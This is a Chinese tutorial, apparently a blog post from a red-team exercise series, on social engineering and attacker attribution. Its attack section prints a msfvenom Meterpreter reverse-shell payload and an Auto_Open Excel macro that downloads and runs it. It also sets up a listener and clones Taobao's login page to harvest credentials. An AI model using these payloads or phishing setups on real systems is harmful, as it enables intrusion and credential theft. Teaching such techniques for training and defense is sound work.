【网络安全】护网系列-社工&溯源

本文涉及的产品
.cn 域名,1个 12个月
简介: 【网络安全】护网系列-社工&溯源

九、社工&溯源

安全产品漏洞: https://www.cnvd.org.cn/flaw/typelist?typeId=32 

CMS系统漏洞: https://www.cnvd.org.cn/flaw/typelist?typeId=29

1. 社工概述

不是技术性攻击,利用的人类弱点,利用欺骗,操纵,诱骗

利用被授权的人(公司财务、公司人事,公司网络管理员,开发人员)

存在风险

技术漏洞 vs 人的漏洞;渗透 vs 社工

人的漏洞比系统技术的漏洞危害更大,82%漏洞来自人**

1.1 电信诈骗手段

image-20230723224635278.png

社会工程学利用了人类多种弱点

1、好奇心
2、信任
3、恐惧
4、无知
5、疏忽

1.2 社工策略

image-20230723225016610.png

2. 社工攻击流程

1、收集目标信息(人事、保安、运维……) 社交网站、冒充身份获取、社工库、远控

2、伪造身份与目标接触(求职者、维修工、同事)

3、编造谎言迷惑目标(发送邮件、连接网络、进 入机房)

4、展开攻击(接入网络、控制机器、窃取信息)

信息搜集

个人信息收集内容与方法 https://mp.weixin.qq.com/s/dt2yHvWDIcdpnC3ag5gXsw 

个人信息泄露查询 
https://monitor.firefox.com/
https://haveibeenpwned.com/ 

注册查询 https://www.reg007.com/ http://regbao.com/ 

阿里云实名认证接口 https://market.aliyun.com/products/57000002/cmapi025518.html

火狐自带的泄漏查询

https://monitor.firefox.com/

外网查泄漏

https://haveibeenpwned.com/

查询手机注册过的网站

https://www.reg007.com/
http://regbao.com/

3. 社工案例&工具

3.1 钓鱼邮件

1、获得邮箱地址或者账号密码
2、伪造发件人邮件地址(不一定能成功)
3、撰写有吸引力的主题 
4、撰写有说服力的内容
5、诱导点击或者下载
钓鱼邮件生成网站

https://emkei.cz/ 
postfix和gophish

3.2 msi宏文件

msfvenom生成msi宏文件

1、获得邮箱地址或者账号密码

利用kali生成一个宏病毒

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.142.132 lport=4444 -f msi -o hack.msi

新建excel文件,保存为xlsm

image-20230723232816681.png

=EXEC("msiexec /q /I http://192.168.142.66/hack.msi") =HALT()

将第一行模式修改为:

Auto_Open

并Enter回车,自动运行宏。

office 宏病毒MSF监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.142.132
set lport 4444
run

3.3 钓鱼网站

1、注册类似域名;伪造子域名

2、仿冒界面

3、记录用户输入内容

kali工具 setoolkit

直接可以克隆一个网站

如果在其他操作系统中克隆,更换social-engineer地址即可
https://github.com/trustedsec/social-engineer-toolkit.git

3.4 SET克隆网站步骤

(1)开启kali

首先开启kali,打开root窗口

image-20230723233842918.png

启动工具

setoolkit

image-20230723233956566.png

工具设置注释

Social-Engineering Attacks——社工 
Website Attack Vectors——网站
Credential Harvester Attack Method——凭据
Site Cloner——站点克隆

image-20230723234222719.png

(2)设置选择

我们先选社工工程学攻击(1回车)

image-20230723234313081.png

然后选攻击网站(2)

image-20230723234358491.png

选攻击网站的凭据(3)

image-20230723234447700.png

克隆站点(2)

image-20230723234648248.png

(3)输入克隆网站

直接默认回车,然后输入想要克隆的网页

https://www.taobao.com/

image-20230723234918435.png

直接回车

克隆成功,查看克隆网站

image-20230723235308311.png

假设此刻有用户输入登录信息

image-20230723235849546.png

用户回车登录,就会在后台显示登录名和密码

image-20230723235751684.png

image-20230724001251921.png

3.5 badusb

可以监控键盘的操作

image-20230724002010380.png

1、刻录代码

 https://store.arduino.cc/usa/arduino-leonardo-with-headers

2、扔下U盘

3、恶意代码自动运行

3.6 近源攻击

1、面试入职

2、在公司附近连接公司WiFi

3、无人机破解WiFi/制作钓鱼WiFi(fluxion)

可以制作一个同名的WiFi,一旦连上可以抓包

https://www.bilibili.com/read/cv21608887/

4、……

5、美女、金钱、送人情

image-20230724002306713.png

4. 社工防范

1、身份确认:是这个人吗?有权限吗?

2、切勿轻易点击链接和打开文件

3、启用多重身份认证

4、运行杀毒软件;更新

5、不连接到不安全的WiFi

6、在社交网络中隐藏个人信息

7、安全培训;攻防演练

5. 溯源概述

通过可疑路经,确认攻击成员身份,完成攻击者画像

攻击者画像

姓名/ID:
攻击IP:
地理位置:
QQ:
IP地址所属公司:
IP地址关联域名:
邮箱:
手机号:
微信/微博/src/id证明:
人物照片:
跳板机(可选):
关联攻击事件:

5.1 攻击源获取

1、获取哪些数据?

攻击者ip、域名、后门、攻击组件、webshell

2、通过什么方式去获取?

蜜罐、安全设备、钓鱼邮件、文件日志进程分析

溯源主要以蜜罐为主

5.2 安全设备

主要针对IP地址操作

image-20230724101613200.png

5.3 钓鱼邮件

对邮件进行分析

image-20230724101638516.png

目录
相关文章
|
6月前
|
安全 Linux Shell
记录一次网络安全应急响应溯源过程
网络安全应急响应是一种组织在发生网络安全事件时采取的行动,旨在迅速应对和缓解潜在的威胁,最大程度地减少损失并恢复正常的网络运行状态
177 0
|
存储 安全 SoC
网络溯源-PSEXEC-简单
我们的入侵检测系统(IDS)已发出警报,指示涉及使用PsExec的可疑横向移动活动。为了有效响应此事件,您作为 SOC 分析师的角色是分析存储在 PCAP 文件中的捕获网络流量。
|
安全 Linux Shell
【网络安全】护网系列-权限维持-Linux权限提升&维持
【网络安全】护网系列-权限维持-Linux权限提升&维持
355 0
|
SQL 安全 网络协议
【网络安全】护网系列-流量分析
【网络安全】护网系列-流量分析
988 1
|
SQL 监控 安全
【网络安全】护网系列-护网安全设备
【网络安全】护网系列-护网安全设备
628 0
|
监控 JavaScript 安全
【网络安全】护网系列-蜜罐&情报搜集
【网络安全】护网系列-蜜罐&情报搜集
971 0
|
网络协议 安全 Shell
【网络安全】护网系列-隧道代理
【网络安全】护网系列-隧道代理
288 0
|
安全 关系型数据库 MySQL
【网络安全】护网系列-应急响应排查
【网络安全】护网系列-应急响应排查
536 0
|
安全 Shell 网络安全
【网络安全】护网系列-windows权限维持
【网络安全】护网系列-windows权限维持
183 0
|
SQL 供应链 安全
【网络安全】护网系列-打点技术
【网络安全】护网系列-打点技术
759 0
下一篇
无影云桌面